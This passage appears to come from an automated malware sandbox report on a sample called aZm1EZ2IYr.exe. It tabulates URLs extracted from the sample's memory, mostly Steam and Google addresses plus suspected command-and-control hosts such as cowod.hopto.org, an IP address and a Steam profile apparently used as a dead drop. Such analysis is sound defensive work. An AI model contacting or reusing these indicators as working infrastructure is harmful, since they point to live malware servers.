                                                        https://s.ytimg.com;aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://steam.tv/aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                            unknown
                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=4XouaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                              unknown
                                                              https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                unknown
                                                                https://store.steampowered.com/points/shop/aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                  unknown
                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                    unknown
                                                                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=D_iTAfDsLHaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                      unknown
                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                        unknown
                                                                        https://sketchfab.comaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://lv.queniujq.cnaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.youtube.com/aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://store.steampowered.com/privacy_agreement/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                unknown
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?vaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                  unknown
                                                                                  https://community.cloudflare.steaaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                    unknown
                                                                                    https://steamcommunity.com/profiles/76561199786602107/inventory/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                      unknown
                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                        unknown
                                                                                        https://www.google.com/recaptcha/aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://checkout.steampowered.com/aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://cowod.hoptotmlaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                            unknown
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28baZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                              unknown
                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                unknown
                                                                                                https://store.steampowered.com/;aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engliaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                  unknown
                                                                                                  https://store.steampowered.com/about/76561199786602107[1].htm.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://cowod.hopto.orgsive/header_logo.pngaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmptrue
                                                                                                    unknown
                                                                                                    https://community.cloudflare.steamstatic.com/aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://steamcommunity.com/my/wishlist/aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                        unknown
                                                                                                        https://t.me/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                            unknown
                                                                                                            https://help.steampowered.com/en/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://steamcommunity.com/market/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                              unknown
                                                                                                              https://store.steampowered.com/news/aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0aZm1EZ2IYr.exefalse
                                                                                                                unknown
                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                    unknown
                                                                                                                    https://recaptcha.net/recaptcha/;aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://steamcommunity.com/discussions/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://cowod.hopto.re | aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp | false | | unknown
https://store.steampowered.com/stats/ | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://medal.tv | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://broadcast.st.dl.eccdnx.com | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://store.steampowered.com/steam_refunds/ | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI& | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1 | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://steamcommunity.com/workshop/ | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://login.steampowered.com/ | aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://65.109.142.154/C | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.c | aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l= | 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
http://cowod.hopto.org/ | aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli | aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | false | | unknown
https://recaptcha.net | aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | URL Reputation: safe | unknown
